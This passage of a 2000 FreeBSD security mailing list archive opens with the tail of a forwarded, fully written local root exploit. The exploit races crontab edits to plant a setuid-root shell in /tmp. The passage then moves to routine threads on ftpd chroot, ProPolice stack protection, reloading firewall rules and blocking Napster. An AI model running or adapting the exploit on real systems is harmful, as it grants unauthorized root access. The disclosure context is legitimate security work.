/usr/bin/crontab utility." fi if [ -r /var/spool/cron ]; then echo "[+] This box has exploitable /var/spool/cron..." else echo "[-] Sorry, this box is not vulnerable to this attack." echo exit 1 fi if [ -u /usr/bin/crontab ]; then echo "[+] This box has setuid crontab utility..." else echo "[-] Sorry, this box has no setuid crontab." echo exit 1 fi cat >dowrite.c <<_EOF_ main() { lseek(1,0,0); write(1,"* * * * * /tmp/.rootcron\n\n",26); ftruncate(1,25); } _EOF_ echo "[+] Compiling helper application #1..." gcc -o dowrite dowrite.c if [ ! -f dowrite ]; then echo "[-] Compilation failed." echo exit 1 fi echo "[+] Application #1 compiled successfully." echo "[+] Creating helper application #2..." cat >/tmp/.rootcron <<_EOF_ #!/bin/sh ( chown root.root /tmp/.r00tcr0n chmod 6755 /tmp/.r00tcr0n rm -f /var/spool/cron/tmp.* crontab -r ) &>/dev/null _EOF_ cat >root.c <<_EOF_ main() { setuid(0); setgid(0); unlink("/tmp/.r00tcr0n"); execl("/bin/bash","bash","-i",0); perror("bash"); } _EOF_ echo "[+] Compiling helper application #3..." gcc -o /tmp/.r00tcr0n root.c if [ ! -f /tmp/.r00tcr0n ]; then echo "[-] Compilation failed." echo exit 1 fi echo "[+] Application #3 compiled successfully." X=0 if [ ! "$1" = "noprep" ]; then echo "[*] Attack against user $DESTUSER, doing $CYCLES setup cycles..." echo " Please be patient, setup might took some time; to skip it if" echo " /var/spool/cron on this machine is already initialized, use" echo " '$0 noprep'." PROB=$[CYCLES*100/32768] test "$PROB" -gt "100" && PROB=100 echo "[+] This gives almost $PROB% probability of success on the first attempt." while [ "$X" -lt "$CYCLES" ]; do X=$[X+1] echo -ne "\r[?] Doing cycle $X of $CYCLES [$[X*100/CYCLES]% done]... " umask 0 ( ( crontab /dev/urandom & usleep 1000; killall crontab ) & ) &>/dev/null done sleep 3;killall -9 crontab &>/dev/null echo echo "[+] Setup complete, /var/spool/cron filled with junk tmp files." CNT=0 echo "[*] Now, doing cleanup and counting the nodes..." for i in 1 2 3 4 5 6 7 8 9; do for j in /var/spool/cron/tmp.${i}*; do echo -n >$j echo -ne "\r[+] Node $CNT clean... " CNT=$[CNT+1] done done echo PROB=$[CNT*100/32768] echo "[+] Found $CNT nodes, approx. $PROB% chance..." if [ "$CNT" -lt "$[CYCLES*2/3]" ]; then echo "[-] Less than 66% of expected nodes were created. Try adjusting the exploit." echo exit 1 fi else echo "[?] Skipping /var/spool/cron initialization. Results might be unpredictable." fi echo "[+] Now I will wait for $DESTUSER to edit his crontab. Could take some time." chmod 755 /tmp/.rootcron while :; do sleep 1 GOT="`ps auxhw|grep ^$DESTUSER|grep crontab|grep -v grep|cut -b10-15|head -1`" test "$GOT" = "" && continue GOT=`echo $GOT` echo "[+] Caught victim at pid $GOT..." if [ ! -f /var/spool/cron/tmp.$GOT ]; then echo "[-] DAMN! We have no node for this pid, bad luck..." continue fi echo '[+] Got this node :) Entering event wait loop...' export DESTUSER ( G=blabla while [ ! "$G" = "" ]; do G="`ps auxhw|grep ^$DESTUSER|grep crontab|grep -v grep`" done sleep 1 echo "[+] Bingo! It happened. Now writing our evil content..." 1>&2 ./dowrite ) >/var/spool/cron/tmp.$GOT echo '* * * * * /bin/true' >.ctab echo "[+] Evil content written. Trying to rehash the daemon..." crontab .ctab crontab -r echo "[+] Entering event loop waiting for exploit to work..." while [ ! -u /tmp/.r00tcr0n ]; do sleep 1 done rm -f .ctab dowrite dowrite.c /tmp/.rootcron root.c echo "[+] Calling the main code..." /tmp/.r00tcr0n echo "[*] Thank you for choosing Marchew Industries." echo exit 1 done ----- End forwarded message ----- -- Regards: Szilveszter ADAM Szeged University Szeged Hungary To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 17 3:23:56 2000 Delivered-To: freebsd-security@freebsd.org Received: from lists01.iafrica.com (lists01.iafrica.com [196.7.0.141]) by hub.freebsd.org (Postfix) with ESMTP id 947E537B479 for ; Fri, 17 Nov 2000 03:23:51 -0800 (PST) Received: from nwl.fw.uunet.co.za ([196.31.2.162]) by lists01.iafrica.com with esmtp (Exim 3.12 #2) id 13wjcF-0006P3-00; Fri, 17 Nov 2000 13:23:35 +0200 Received: (from nobody@localhost) by nwl.fw.uunet.co.za (8.8.8/8.6.9) id NAA24573; Fri, 17 Nov 2000 13:23:43 +0200 (SAST) Received: by nwl.fw.uunet.co.za via recvmail id 24304; Fri Nov 17 13:22:12 2000 Received: from sheldonh (helo=axl.fw.uunet.co.za) by axl.fw.uunet.co.za with local-esmtp (Exim 3.16 #1) id 13wjat-0000ao-00; Fri, 17 Nov 2000 13:22:11 +0200 From: Sheldon Hearn To: Marcin Krasowski Cc: Sheldon Jones , freebsd-security@freebsd.org Subject: Re: chroot and ftpd In-reply-to: Your message of "Fri, 17 Nov 2000 06:29:28 +0100." <3A14C238.19C7C60C@weblab.pl> Date: Fri, 17 Nov 2000 13:22:11 +0200 Message-ID: <2281.974460131@axl.fw.uunet.co.za> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 17 Nov 2000 06:29:28 +0100, Marcin Krasowski wrote: > > Does anyone know of a way to have the chroot function in ftpd lock a > > user into a sub-directory under their user directory. I would like a > > way to keep the users in a sub-directory under their root dir. > > Just put the name of the user into the /etc/ftpchroot file (create it if > You dont have one). You may have missed the key part of Sheldon's mail that mentioned a "sub-directory". The stock ftp daemon shipped with FreeBSD does not have this facility. It wouldn't be at all difficult to extend the structure of the ftpchroot file to support this in a backward compatible manner. I wouldn't feel comfortable doing this, because I'm not convinced that the ftpchroot file is exclusively owned by and relevant to the ftp daemon. I can understand that this is a desirable feature, but I'm it's probably worth further discussion off this list, where the topic is off-charter. For example, it might be preferable to introduce a ~/ftpdrc file, the contents of which are executed under the user's userid during the FTP login. I'd suggest that interested parties follow up to me personally (_not_ to this list) and I'll post a digest back to the freebsd-current mailing list. Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 17 4:27:10 2000 Delivered-To: freebsd-security@freebsd.org Received: from cube.gelatinous.com (cube.gelatinous.com [207.82.194.150]) by hub.freebsd.org (Postfix) with SMTP id E2D5337B4C5 for ; Fri, 17 Nov 2000 04:27:08 -0800 (PST) Received: (qmail 54415 invoked by uid 1000); 17 Nov 2000 12:27:08 -0000 Date: Fri, 17 Nov 2000 04:27:08 -0800 From: Aaron Smith To: Kris Kennaway Cc: Garrett Wollman , freebsd-security@FreeBSD.ORG Subject: Re: Is it possible to configure a FreeBSD VPN server to talk to Windows/Linux/BSD clients Message-ID: <20001117042708.C36817@gelatinous.com> References: <200009231952.PAA32269@khavrinen.lcs.mit.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from kris@FreeBSD.org on Sat, Sep 23, 2000 at 02:01:24PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org i wrote up a howto for the method i am using to tunnel several masqueraded networks using freebsd ipsec. it's not interoperability related, but i had to dig quite a bit to find and piece together non-japanese information, so i wanted to add to the pool. hopefully someone will find it helpful. let me know if you have comments. http://www.mutex.org/aaron/tips/ipsec aaron On Sat, Sep 23, 2000 at 02:01:24PM -0700, Kris Kennaway wrote: > On Sat, 23 Sep 2000, Garrett Wollman wrote: > > > < said: > > > > > Linux (among others) - see www.kame.net and the docs included in the port > > > distfile for more information. General information on ipsec can be found > > > > The racoon documentation is almost totally unintelligible, especially > > for new users. Perhaps the Japanese documentation is better, but most > > FreeBSD users outside of Japan don't understand Japanese. I ended up > > reading the parser source code and still wasn't sufficiently > > enlightened. > > Yeah, it's a problem. I've had one offer from someone who's figured it out > on her own including interoperability, but havent got anything from her > yet. I'll bug her until I get something :-) > > Kris > > -- > In God we Trust -- all others must submit an X.509 certificate. > -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 17 8:29:56 2000 Delivered-To: freebsd-security@freebsd.org Received: from epicsol.org (epicsol.org [209.100.173.7]) by hub.freebsd.org (Postfix) with ESMTP id AAB4437B479 for ; Fri, 17 Nov 2000 08:29:54 -0800 (PST) Received: (from jnelson@localhost) by epicsol.org (8.9.3/8.9.3) id KAA61562; Fri, 17 Nov 2000 10:29:50 -0600 (CST) (envelope-from jnelson) Date: Fri, 17 Nov 2000 10:29:50 -0600 (CST) From: Jeremy Nelson Message-Id: <200011171629.KAA61562@epicsol.org> To: freebsd-security@freebsd.org Subject: Re: FYI: Propolice for gcc-2.95.2 In-Reply-To: Organization: Damage, org. Cc: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In article you posted: >At ftp://dse.doc.ic.ac.uk/pub/misc/bcc/ there is another set of patches >that add bounds-checking to GCC, but unfortunately the newest is for GCC >2.7.2. The current maintainer's home page is at: http://web.inter.nl.net/hcc/Haj.Ten.Brugge/ And there are versions of bounds checking gcc up through 2.95.2. (It is an excellent debugging tool, i use it extensively.) Jeremy To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 17 14:37:56 2000 Delivered-To: freebsd-security@freebsd.org Received: from pt-quorum.com (pt-quorum.com [209.10.167.210]) by hub.freebsd.org (Postfix) with ESMTP id 3165237B4C5 for ; Fri, 17 Nov 2000 14:37:52 -0800 (PST) Received: from n2 (d128175.lsb.PT.EU.net [193.126.128.175]) by pt-quorum.com (8.9.3/8.9.3) with SMTP id WAA24182 for ; Fri, 17 Nov 2000 22:32:31 GMT Message-ID: <00bd01c050e7$6f68f1f0$0200a8c0@n2> From: "Nuno Teixeira" To: Subject: Restarting Firewall ruleset Date: Fri, 17 Nov 2000 22:40:23 -0000 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello to all, Finally I configured a ppp firewall for my FreeBSD gateway. It is working without any problems. My question is: how to restart firewall. I'm asking this, because I want to make a lot of tests with it (opening / closing services, etc) and I don't know how to restart it without rebooting the gateway machine. Thanks very much, Nuno Teixeira To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 17 15: 3:49 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.vxu.se (oxeln.vxu.se [194.47.65.30]) by hub.freebsd.org (Postfix) with ESMTP id 6A2D437B479 for ; Fri, 17 Nov 2000 15:03:46 -0800 (PST) Received: from XGod (aaldv97.idet.vxu.se [194.47.111.20]) by mail.vxu.se (Netscape Messaging Server 4.15) with SMTP id G46YQ800.6ME for ; Sat, 18 Nov 2000 00:03:44 +0100 Message-ID: <001e01c050ea$a5f32a80$8e00a8c0@XGod> From: "Andreas Alderud" To: Subject: Re: FYI: Propolice for gcc-2.95.2 Date: Sat, 18 Nov 2000 00:03:50 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Mike Silbersack wrote: >MAC and stack-smashing protection are certainly not mutally >exclusive. Even if the base system is configured with strong access >barriers to compromised programs, there is still lesser mischief >that can be performed. Hardly needed, look at VMS for example, what is needed is more layers, not just user and god(i.e. root). Besides, getting past the stack guards in programs isn't much harder than writing an ordinary exploit, though a bit different. >Additionally, it's very likely that people will still installed wu-ftpd, >qpopper, imapd, etc from ports. None of trustedbsd's features will help >when confronted with the default behavior of these programs. Stack >protection, on the other hand, would have prevented a good amount of the >past bugs in these programs, and will likely continue to be a good >protection method. Good for debuging, but an exploit is quite more than just an ordinary overflow. I welcome it as a developer debuging feature in 5.x, and as a security hardening feature in 4.x. /Kind regards, David A. Alderud To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 17 15: 6:43 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.vxu.se (oxeln.vxu.se [194.47.65.30]) by hub.freebsd.org (Postfix) with ESMTP id 3271537B479 for ; Fri, 17 Nov 2000 15:06:39 -0800 (PST) Received: from XGod (aaldv97.idet.vxu.se [194.47.111.20]) by mail.vxu.se (Netscape Messaging Server 4.15) with SMTP id G46YV200.IL6 for ; Sat, 18 Nov 2000 00:06:38 +0100 Message-ID: <002e01c050eb$0d6b8220$8e00a8c0@XGod> From: "Andreas Alderud" To: Subject: Re: Restarting Firewall ruleset Date: Sat, 18 Nov 2000 00:06:43 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Nuno Teixeira wrote: >My question is: how to restart firewall. ipfw -f flush with it you can supply the rule number. man ipfw ;-) /Kind regards, David A. Alderud To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 17 15:24: 7 2000 Delivered-To: freebsd-security@freebsd.org Received: from rapidnet.com (rapidnet.com [205.164.216.1]) by hub.freebsd.org (Postfix) with ESMTP id D2F4B37B479 for ; Fri, 17 Nov 2000 15:24:01 -0800 (PST) Received: from localhost (traviso@localhost) by rapidnet.com (8.9.3/8.9.3) with ESMTP id QAA81188; Fri, 17 Nov 2000 16:23:44 -0700 (MST) Date: Fri, 17 Nov 2000 16:23:44 -0700 (MST) From: Travis {RapidSupport} To: Nuno Teixeira Cc: freebsd-security@FreeBSD.ORG Subject: Re: Restarting Firewall ruleset In-Reply-To: <00bd01c050e7$6f68f1f0$0200a8c0@n2> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 17 Nov 2000, Nuno Teixeira wrote: > Finally I configured a ppp firewall for my FreeBSD gateway. It is working > without any problems. > > My question is: how to restart firewall. I'm asking this, because I want to > make a lot of tests with it (opening / closing services, etc) and I don't > know how to restart it without rebooting the gateway machine. If you are running ipfw you will need to flush then reload: ipfw flush [y] ipfw /etc/firewalls/blah ...where "blah" is the firewall... If you are running ipf then: ipf -F a && ipf -f /etc/firewalls/ipf.blah ...where "ipf.blah" is the firewall... Travis /* -=[ Travis Ogden ]-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= RapidNet Admin Team "Courage is not defined by those who Phone#: 605.341.3283 fought and did not fall, but by those ICQ#: 30220771 who fought, fell, and rose again." Mail: traviso@RapidNet.com Fax#: 605.348.1031 Web: www.RapidNet.com/~traviso 800#: 800.763.2525 ATTENTION! "RapidNet will be moving to a new home the last week in November. Our new offices will be located at 330 Knollwood Drive, Rapid City, SD 57701." -=-=-=-=-=-=-=-=-=-=-=-=-=-[ traviso@rapidnet.com ]=-=-=-=-= */ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 17 15:44:48 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 97D4C37B479 for ; Fri, 17 Nov 2000 15:44:45 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id eAHNjqP77967; Fri, 17 Nov 2000 15:45:52 -0800 (PST) (envelope-from kris) Date: Fri, 17 Nov 2000 15:45:51 -0800 From: Kris Kennaway To: KOJIMA Hajime Cc: security@FreeBSD.ORG Subject: Base system gcc patch (Re: FYI: Propolice for gcc-2.95.2) Message-ID: <20001117154551.A77867@citusc17.usc.edu> References: <46896.974343158@ideon.st.ryukoku.ac.jp> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="EVF5PPMfhYS0aIcm" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <46896.974343158@ideon.st.ryukoku.ac.jp>; from kjm@rins.ryukoku.ac.jp on Thu, Nov 16, 2000 at 11:52:38AM +0900 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --EVF5PPMfhYS0aIcm Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable This was trivial to get working on FreeBSD, but here is a patch against the system gcc in 4.x which will compile a ProPolice-enabled version, so FreeBSD users can start easily making use of this. The patch is the same for 5.x users except you will need to replace "contrib/gcc" with "contrib/gcc.295" in the diff. http://www.freebsd.org/~kris/protector.patch Once you have done a buildworld and installed the new compiler, you can start playing with adding "-fstack-protector" into CFLAGS and e.g. build a new world. I haven't actually tested the results of this yet, so don't do that on your production systems yet ;-) It does seem to work, however: mollari# /tmp/smash AAAAAAAAAAAAAAAAAAAAAAAAAA main: stack smashing attack? Segmentation fault (core dumped) (gdb) bt #0 0x8048726 in __stack_smash_handler () #1 0x8048665 in main () #2 0x41414141 in ?? () Cannot access memory at address 0x41414141. :-) The one suggestion I have at this stage is to make _stack_smash_handler syslog() the error so there is a system record of the potential attack. There may be a reason that isn't feasible, however. Nice work! Kris On Thu, Nov 16, 2000 at 11:52:38AM +0900, KOJIMA Hajime wrote: > FYI: "Propolice", GCC extension for protecting applications from > stack-smashing attacks, for gcc-2.95.2 is now available. > =20 > >=20 > ---- > KOJIMA Hajime - Ryukoku University, Seta, Ootsu, Shiga, 520-2194 Japan > [Office] kjm@rins.ryukoku.ac.jp, http://www.st.ryukoku.ac.jp/~kjm/ >=20 >=20 > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message --EVF5PPMfhYS0aIcm Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjoVwy8ACgkQWry0BWjoQKVJJgCg4eKgfBWurflDWSmZkrOqAqIZ mJIAmwWViG46Jz6afWN5yAdbpRziUruY =cBxL -----END PGP SIGNATURE----- --EVF5PPMfhYS0aIcm-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 17 16:36:36 2000 Delivered-To: freebsd-security@freebsd.org Received: from caligula.anu.edu.au (caligula.anu.edu.au [150.203.224.42]) by hub.freebsd.org (Postfix) with ESMTP id B53A937B4C5 for ; Fri, 17 Nov 2000 16:36:31 -0800 (PST) Received: (from avalon@localhost) by caligula.anu.edu.au (8.9.3/8.9.3) id LAA15457; Sat, 18 Nov 2000 11:35:57 +1100 (EST) From: Darren Reed Message-Id: <200011180035.LAA15457@caligula.anu.edu.au> Subject: Re: Restarting Firewall ruleset To: traviso@RapidNet.com (Travis {RapidSupport}) Date: Sat, 18 Nov 2000 11:35:57 +1100 (Australia/ACT) Cc: nuno.teixeira@pt-quorum.com (Nuno Teixeira), freebsd-security@FreeBSD.ORG In-Reply-To: from "Travis {RapidSupport}" at Nov 17, 2000 04:23:44 PM X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Travis {RapidSupport}, sie said: > > If you are running ipf then: > > ipf -F a && ipf -f /etc/firewalls/ipf.blah No, you should do: ipf -If /etc/firewalls/ipf.blah && ipf -s -IF a load rules into alternative set, if successful then switch active sets and flush the old rules. Doing this means there is no gap in which a partial ruleset is loaded and active. Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 17 16:36:41 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.ipfw.org (cr308584-a.wlfdle1.on.wave.home.com [24.114.52.208]) by hub.freebsd.org (Postfix) with ESMTP id 628A237B4CF for ; Fri, 17 Nov 2000 16:36:33 -0800 (PST) Received: from apollo (apollo.objtech.com [192.168.111.5]) by mail.ipfw.org (Postfix) with ESMTP id E2D843183; Fri, 17 Nov 2000 19:36:31 -0500 (EST) Date: Fri, 17 Nov 2000 19:36:32 -0500 From: Peter Chiu X-Mailer: The Bat! (v1.47 Halloween Edition) Personal Reply-To: Webbie X-Priority: 3 (Normal) Message-ID: <16455350730.20001117193632@ipfw.org> To: "Nuno Teixeira" Cc: freebsd-security@FreeBSD.ORG Subject: Re: Restarting Firewall ruleset In-reply-To: <00bd01c050e7$6f68f1f0$0200a8c0@n2> References: <00bd01c050e7$6f68f1f0$0200a8c0@n2> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello Nuno, I use sh /etc/rc.firewall /etc/rc.firewall.myrules rc.firewall.myrules is the file stored all rules. Friday, November 17, 2000, 5:40:23 PM, you wrote: NT> Hello to all, NT> Finally I configured a ppp firewall for my FreeBSD gateway. It is working NT> without any problems. NT> My question is: how to restart firewall. I'm asking this, because I want to NT> make a lot of tests with it (opening / closing services, etc) and I don't NT> know how to restart it without rebooting the gateway machine. NT> Thanks very much, NT> Nuno Teixeira NT> To Unsubscribe: send mail to majordomo@FreeBSD.org NT> with "unsubscribe freebsd-security" in the body of the message -- Peter \\|// (o o) +-------------------------oOOo-(_)-oOOo-----------------------------+ EMail : mailto:webbie(at)ipfw(dot)org PGP Key : http://www.ipfw.org/pgpkey.txt PGP Fingerprint: 0B9F E081 35CD B9AF 58EA 7E43 38EC C84F 4AB4 792C +-------------------------------------------------------------------+ Small animal kamikaze attack on power supplies To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 17 16:41:46 2000 Delivered-To: freebsd-security@freebsd.org Received: from libertad.univalle.edu.co (libertad.univalle.edu.co [216.6.69.11]) by hub.freebsd.org (Postfix) with ESMTP id F382037B479 for ; Fri, 17 Nov 2000 16:41:21 -0800 (PST) Received: from localhost (buliwyf@localhost) by libertad.univalle.edu.co (8.10.0/8.10.0) with ESMTP id eAI0nsa97059 for ; Fri, 17 Nov 2000 19:49:54 -0500 (COT) Date: Fri, 17 Nov 2000 19:49:54 -0500 (COT) From: Buliwyf McGraw To: security@FreeBSD.ORG Subject: Napster Port Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi to everyone! This is my question: - I want to deny all access to Napster from my subnet. I'm using ip filter... but i dont know what is the port that i need to block... Any sugestion about the right rule in my gateway??? Thanks... ======================================================================= Buliwyf McGraw Administrador del Servidor Libertad Centro de Servicios de Informacion Universidad del Valle ======================================================================= To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 17 17:22:51 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66]) by hub.freebsd.org (Postfix) with ESMTP id 8C46837B479 for ; Fri, 17 Nov 2000 17:22:48 -0800 (PST) Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131]) by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id SAA20324; Fri, 17 Nov 2000 18:22:46 -0700 (MST) (envelope-from nate@nomad.yogotech.com) Received: (from nate@localhost) by nomad.yogotech.com (8.8.8/8.8.8) id SAA23299; Fri, 17 Nov 2000 18:22:46 -0700 (MST) (envelope-from nate) From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14869.55781.674921.949509@nomad.yogotech.com> Date: Fri, 17 Nov 2000 18:22:45 -0700 (MST) To: Buliwyf McGraw Cc: security@FreeBSD.ORG Subject: Re: Napster Port In-Reply-To: References: X-Mailer: VM 6.75 under 21.1 (patch 12) "Channel Islands" XEmacs Lucid Reply-To: nate@yogotech.com (Nate Williams) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Hi to everyone! > This is my question: > - I want to deny all access to Napster from my subnet. I'm using ip > filter... but i dont know what is the port that i need to block... > Any sugestion about the right rule in my gateway??? This is the best I've got so far... # Disable Napster /sbin/ipfw add 600 deny log tcp from any to 208.178.163.56/29 via ${netif} /sbin/ipfw add 610 deny log tcp from any to 208.178.175.128/29 via ${netif} /sbin/ipfw add 620 deny log tcp from any to 208.49.239.240/28 via ${netif} /sbin/ipfw add 630 deny log tcp from any to 208.49.228.0/24 via ${netif} /sbin/ipfw add 640 deny log tcp from any to 208.184.216.0/24 via ${netif} /sbin/ipfw add 650 deny log tcp from any to 64.124.41.0/24 via ${netif} /sbin/ipfw add 660 deny log tcp from any 8888 to any via ${netif} {where 'netif' is the network interface for the internet} Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 17 17:26:45 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.kyx.net (unknown [24.113.50.147]) by hub.freebsd.org (Postfix) with ESMTP id B3B8F37B4C5 for ; Fri, 17 Nov 2000 17:26:35 -0800 (PST) Received: from smp.kyx.net (unknown [10.22.22.45]) by mail.kyx.net (Postfix) with SMTP id 9105B1DC09; Fri, 17 Nov 2000 17:29:46 -0800 (PST) From: Dragos Ruiu Organization: kyx.net To: nate@yogotech.com (Nate Williams), Nate Williams , Buliwyf McGraw Subject: Re: Napster Port Date: Fri, 17 Nov 2000 17:24:06 -0800 X-Mailer: KYX-CP/M [version core00-mail-92] Content-Type: text/plain Cc: security@FreeBSD.ORG References: <14869.55781.674921.949509@nomad.yogotech.com> In-Reply-To: <14869.55781.674921.949509@nomad.yogotech.com> MIME-Version: 1.0 Message-Id: <00111717251704.29995@smp.kyx.net> Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Napster protocol description: url: http://opennap.sourceforge.net/napster.txt cheers, --dr On Fri, 17 Nov 2000, Nate Williams wrote: > > Hi to everyone! > > This is my question: > > - I want to deny all access to Napster from my subnet. I'm using ip > > filter... but i dont know what is the port that i need to block... > > Any sugestion about the right rule in my gateway??? > > This is the best I've got so far... > > # Disable Napster > /sbin/ipfw add 600 deny log tcp from any to 208.178.163.56/29 via ${netif} > /sbin/ipfw add 610 deny log tcp from any to 208.178.175.128/29 via ${netif} > /sbin/ipfw add 620 deny log tcp from any to 208.49.239.240/28 via ${netif} > /sbin/ipfw add 630 deny log tcp from any to 208.49.228.0/24 via ${netif} > /sbin/ipfw add 640 deny log tcp from any to 208.184.216.0/24 via ${netif} > /sbin/ipfw add 650 deny log tcp from any to 64.124.41.0/24 via ${netif} > /sbin/ipfw add 660 deny log tcp from any 8888 to any via ${netif} > > {where 'netif' is the network interface for the internet} To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 17 18: 8:41 2000 Delivered-To: freebsd-security@freebsd.org Received: from relay.nuxi.com (nuxi.cs.ucdavis.edu [169.237.7.38]) by hub.freebsd.org (Postfix) with ESMTP id 31C0437B479 for ; Fri, 17 Nov 2000 18:08:39 -0800 (PST) Received: from dragon.nuxi.com (root@trang.nuxi.com [209.152.133.57]) by relay.nuxi.com (8.9.3/8.9.3) with ESMTP id SAA03285; Fri, 17 Nov 2000 18:08:38 -0800 (PST) (envelope-from obrien@NUXI.com) Received: (from obrien@localhost) by dragon.nuxi.com (8.11.1/8.11.1) id eAI28b633406; Fri, 17 Nov 2000 18:08:37 -0800 (PST) (envelope-from obrien) Date: Fri, 17 Nov 2000 18:08:32 -0800 From: "David O'Brien" To: KOJIMA Hajime Cc: security@FreeBSD.ORG Subject: Re: FYI: Propolice for gcc-2.95.2 Message-ID: <20001117180832.A33370@dragon.nuxi.com> Reply-To: obrien@FreeBSD.ORG References: <46896.974343158@ideon.st.ryukoku.ac.jp> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <46896.974343158@ideon.st.ryukoku.ac.jp>; from kjm@rins.ryukoku.ac.jp on Thu, Nov 16, 2000 at 11:52:38AM +0900 X-Operating-System: FreeBSD 5.0-CURRENT Organization: The NUXI BSD group X-Pgp-Rsa-Fingerprint: B7 4D 3E E9 11 39 5F A3 90 76 5D 69 58 D9 98 7A X-Pgp-Rsa-Keyid: 1024/34F9F9D5 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Nov 16, 2000 at 11:52:38AM +0900, KOJIMA Hajime wrote: > FYI: "Propolice", GCC extension for protecting applications from > stack-smashing attacks, for gcc-2.95.2 is now available. > > I'll look at adding this to the bc-gcc port. To Unsubscribe: send mail to 